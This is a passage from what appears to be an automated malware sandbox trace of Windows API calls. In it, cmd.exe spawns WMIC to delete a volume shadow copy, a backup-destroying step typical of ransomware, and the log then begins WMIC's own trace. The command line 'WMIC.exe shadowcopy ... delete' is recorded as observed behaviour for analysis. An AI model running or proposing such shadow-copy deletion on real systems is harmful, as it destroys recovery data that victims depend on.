"c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0094.877] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f4a0 | out: lpFindFileData=0x12f4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x35b870 [0094.877] FindClose (in: hFindFile=0x35b870 | out: hFindFile=0x35b870) returned 1 [0094.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x12f4a0 | out: lpFindFileData=0x12f4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x35b870 [0094.877] FindClose (in: hFindFile=0x35b870 | out: hFindFile=0x35b870) returned 1 [0094.877] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0094.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x12f4a0 | out: lpFindFileData=0x12f4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x35b870 [0094.878] FindClose (in: hFindFile=0x35b870 | out: hFindFile=0x35b870) returned 1 [0094.878] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0094.878] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0094.878] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0094.878] GetProcessHeap () returned 0x340000 [0094.878] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ad60 | out: hHeap=0x340000) returned 1 [0094.878] GetEnvironmentStringsW () returned 0x35b870* [0094.878] GetProcessHeap () returned 0x340000 [0094.878] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35c360 [0094.878] FreeEnvironmentStringsW (penv=0x35b870) returned 1 [0094.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49efc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.878] GetProcessHeap () returned 0x340000 [0094.878] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35b800 | out: hHeap=0x340000) returned 1 [0094.878] GetProcessHeap () returned 0x340000 [0094.878] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4016) returned 0x35ce50 [0094.879] GetProcessHeap () returned 0x340000 [0094.879] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe4) returned 0x359680 [0094.879] GetProcessHeap () returned 0x340000 [0094.879] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ce50 | out: hHeap=0x340000) returned 1 [0094.879] GetConsoleOutputCP () returned 0x1b5 [0094.879] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49efbfe0 | out: lpCPInfo=0x49efbfe0) returned 1 [0094.879] GetUserDefaultLCID () returned 0x409 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ef7b50, cchData=8 | out: lpLCData=":") returned 2 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8a0, cchData=128 | out: lpLCData="0") returned 2 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8a0, cchData=128 | out: lpLCData="0") returned 2 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8a0, cchData=128 | out: lpLCData="1") returned 2 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f0a740, cchData=8 | out: lpLCData="/") returned 2 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f0a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f0a460, cchData=32 | out: lpLCData="Tue") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f0a420, cchData=32 | out: lpLCData="Wed") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f0a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f0a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f0a360, cchData=32 | out: lpLCData="Sat") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f0a700, cchData=32 | out: lpLCData="Sun") returned 4 [0094.880] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ef7b40, cchData=8 | out: lpLCData=".") returned 2 [0094.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f0a4e0, cchData=8 | out: lpLCData=",") returned 2 [0094.881] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.881] GetProcessHeap () returned 0x340000 [0094.881] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20c) returned 0x3597e0 [0094.881] GetConsoleTitleW (in: lpConsoleTitle=0x3597e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0094.882] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0094.882] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0094.882] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0094.882] GetProcessHeap () returned 0x340000 [0094.882] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4012) returned 0x35ce50 [0094.882] GetProcessHeap () returned 0x340000 [0094.882] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ce50 | out: hHeap=0x340000) returned 1 [0094.885] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0094.885] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0094.885] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0094.885] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0094.885] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0094.885] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0094.885] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0094.885] GetProcessHeap () returned 0x340000 [0094.885] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x359a00 [0094.885] GetProcessHeap () returned 0x340000 [0094.885] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x54) returned 0x359ac0 [0094.887] GetProcessHeap () returned 0x340000 [0094.887] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x9e) returned 0x359b20 [0094.888] GetConsoleTitleW (in: lpConsoleTitle=0x12f7b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.888] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f340, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f320, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f320*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0094.889] GetProcessHeap () returned 0x340000 [0094.889] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x359bd0 [0094.889] GetProcessHeap () returned 0x340000 [0094.889] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe2) returned 0x359df0 [0094.889] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.889] GetProcessHeap () returned 0x340000 [0094.889] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x420) returned 0x341320 [0094.889] SetErrorMode (uMode=0x0) returned 0x8001 [0094.889] SetErrorMode (uMode=0x1) returned 0x0 [0094.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x341330, lpFilePart=0x12f040 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x12f040*="wbem") returned 0x18 [0094.889] SetErrorMode (uMode=0x8001) returned 0x1 [0094.889] GetProcessHeap () returned 0x340000 [0094.889] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x341320, Size=0x54) returned 0x341320 [0094.889] GetProcessHeap () returned 0x340000 [0094.889] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x341320) returned 0x54 [0094.890] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0094.890] GetProcessHeap () returned 0x340000 [0094.890] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x48) returned 0x359ee0 [0094.890] GetProcessHeap () returned 0x340000 [0094.890] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x7c) returned 0x359f30 [0094.891] GetProcessHeap () returned 0x340000 [0094.891] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x359f30, Size=0x48) returned 0x359f30 [0094.891] GetProcessHeap () returned 0x340000 [0094.891] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x359f30) returned 0x48 [0094.891] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.891] GetProcessHeap () returned 0x340000 [0094.891] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe8) returned 0x359f90 [0094.894] GetProcessHeap () returned 0x340000 [0094.894] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x359f90, Size=0x7e) returned 0x359f90 [0094.894] GetProcessHeap () returned 0x340000 [0094.894] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x359f90) returned 0x7e [0094.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.895] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x12edb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12edb0) returned 0x35a020 [0094.896] GetProcessHeap () returned 0x340000 [0094.896] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x28) returned 0x3546c0 [0094.896] FindClose (in: hFindFile=0x35a020 | out: hFindFile=0x35a020) returned 1 [0094.896] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0094.896] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0094.896] GetConsoleTitleW (in: lpConsoleTitle=0x12f300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.896] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f0b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f078 | out: lpAttributeList=0x12f0b8, lpSize=0x12f078) returned 1 [0094.896] UpdateProcThreadAttribute (in: lpAttributeList=0x12f0b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f068, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f0b8, lpPreviousValue=0x0) returned 1 [0094.896] GetStartupInfoW (in: lpStartupInfo=0x12f1d0 | out: lpStartupInfo=0x12f1d0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0094.896] GetProcessHeap () returned 0x340000 [0094.896] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x20) returned 0x3546f0 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.896] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0094.897] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0094.897] GetProcessHeap () returned 0x340000 [0094.897] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3546f0 | out: hHeap=0x340000) returned 1 [0094.897] GetProcessHeap () returned 0x340000 [0094.897] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x12) returned 0x358a30 [0094.897] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0094.898] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12f0f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f0a0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete", lpProcessInformation=0x12f0a0*(hProcess=0x54, hThread=0x50, dwProcessId=0xadc, dwThreadId=0x618)) returned 1 [0094.902] CloseHandle (hObject=0x50) returned 1 [0094.902] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.902] GetProcessHeap () returned 0x340000 [0094.902] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35c360 | out: hHeap=0x340000) returned 1 [0094.902] GetEnvironmentStringsW () returned 0x35ad60* [0094.902] GetProcessHeap () returned 0x340000 [0094.902] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35b850 [0094.902] FreeEnvironmentStringsW (penv=0x35ad60) returned 1 [0094.902] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0096.834] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12efe8 | out: lpExitCode=0x12efe8*=0x0) returned 1 [0096.834] CloseHandle (hObject=0x54) returned 1 [0096.834] _vsnwprintf (in: _Buffer=0x12f258, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eff8 | out: _Buffer="00000000") returned 8 [0096.835] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0096.835] GetProcessHeap () returned 0x340000 [0096.835] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35b850 | out: hHeap=0x340000) returned 1 [0096.835] GetEnvironmentStringsW () returned 0x35ad60* [0096.835] GetProcessHeap () returned 0x340000 [0096.835] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35b880 [0096.835] FreeEnvironmentStringsW (penv=0x35ad60) returned 1 [0096.835] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0096.835] GetProcessHeap () returned 0x340000 [0096.835] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35b880 | out: hHeap=0x340000) returned 1 [0096.835] GetEnvironmentStringsW () returned 0x35ad60* [0096.835] GetProcessHeap () returned 0x340000 [0096.835] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35b880 [0096.835] FreeEnvironmentStringsW (penv=0x35ad60) returned 1 [0096.835] GetProcessHeap () returned 0x340000 [0096.835] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x358a30 | out: hHeap=0x340000) returned 1 [0096.835] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f0b8 | out: lpAttributeList=0x12f0b8) [0096.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.835] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0096.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49eee194 | out: lpMode=0x49eee194) returned 1 [0096.835] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.835] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49eee198 | out: lpMode=0x49eee198) returned 1 [0096.836] SetConsoleInputExeNameW () returned 0x1 [0096.836] GetConsoleOutputCP () returned 0x1b5 [0096.836] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49efbfe0 | out: lpCPInfo=0x49efbfe0) returned 1 [0096.836] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0096.836] exit (_Code=0) Process: id = "19" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x204f7000" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x270" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 144 os_tid = 0x618 [0094.939] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fdf0 | out: lpSystemTimeAsFileTime=0x18fdf0*(dwLowDateTime=0x402c9450, dwHighDateTime=0x1d68245)) [0094.939] GetCurrentProcessId () returned 0xadc [0094.939] GetCurrentThreadId () returned 0x618 [0094.939] GetTickCount () returned 0x114d78b [0094.939] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdf8 | out: lpPerformanceCount=0x18fdf8*=21483244951) returned 1 [0094.943] GetModuleHandleW (lpModuleName=0x0) returned 0xff380000 [0094.943] __set_app_type (_Type=0x1) [0094.943] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3cced0) returned 0x0 [0094.943] __wgetmainargs (in: _Argc=0xff3f2380, _Argv=0xff3f2390, _Env=0xff3f2388, _DoWildCard=0, _StartInfo=0xff3f239c | out: _Argc=0xff3f2380, _Argv=0xff3f2390, _Env=0xff3f2388) returned 0 [0094.943] ??0CHString@@QEAA@XZ () returned 0xff3f2ab0 [0094.943] malloc (_Size=0x30) returned 0x4c5a50 [0094.943] malloc (_Size=0x70) returned 0x4c5a90 [0094.944] malloc (_Size=0x50) returned 0x4c7d30 [0094.944] malloc (_Size=0x30) returned 0x4c7d90 [0094.944] malloc (_Size=0x48) returned 0x4c7dd0 [0094.944] malloc (_Size=0x30) returned 0x4c7e20 [0094.944] malloc (_Size=0x30) returned 0x4c7e60 [0094.944] ??0CHString@@QEAA@XZ () returned 0xff3f2f58 [0094.944] malloc (_Size=0x30) returned 0x4c7ea0 [0094.944] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0094.944] SetConsoleCtrlHandler (HandlerRoutine=0xff3c5724, Add=1) returned 1 [0094.944] _onexit (_Func=0xff3df378) returned 0xff3df378 [0094.944] _onexit (_Func=0xff3df490) returned 0xff3df490 [0094.944] _onexit (_Func=0xff3df4d0) returned 0xff3df4d0 [0094.944] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.944] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0094.947] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0094.952] CoCreateInstance (in: rclsid=0xff3873a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff387370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff3f2940 | out: ppv=0xff3f2940*=0x1f71390) returned 0x0 [0094.962] GetCurrentProcess () returned 0xffffffffffffffff [0094.962] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fbc0 | out: TokenHandle=0x18fbc0*=0xf4) returned 1 [0094.962] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fbb8 | out: TokenInformation=0x0, ReturnLength=0x18fbb8) returned 0 [0094.963] malloc (_Size=0x118) returned 0x4c69a0 [0094.963] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4c69a0, TokenInformationLength=0x118, ReturnLength=0x18fbb8 | out: TokenInformation=0x4c69a0, ReturnLength=0x18fbb8) returned 1 [0094.963] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4c69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), 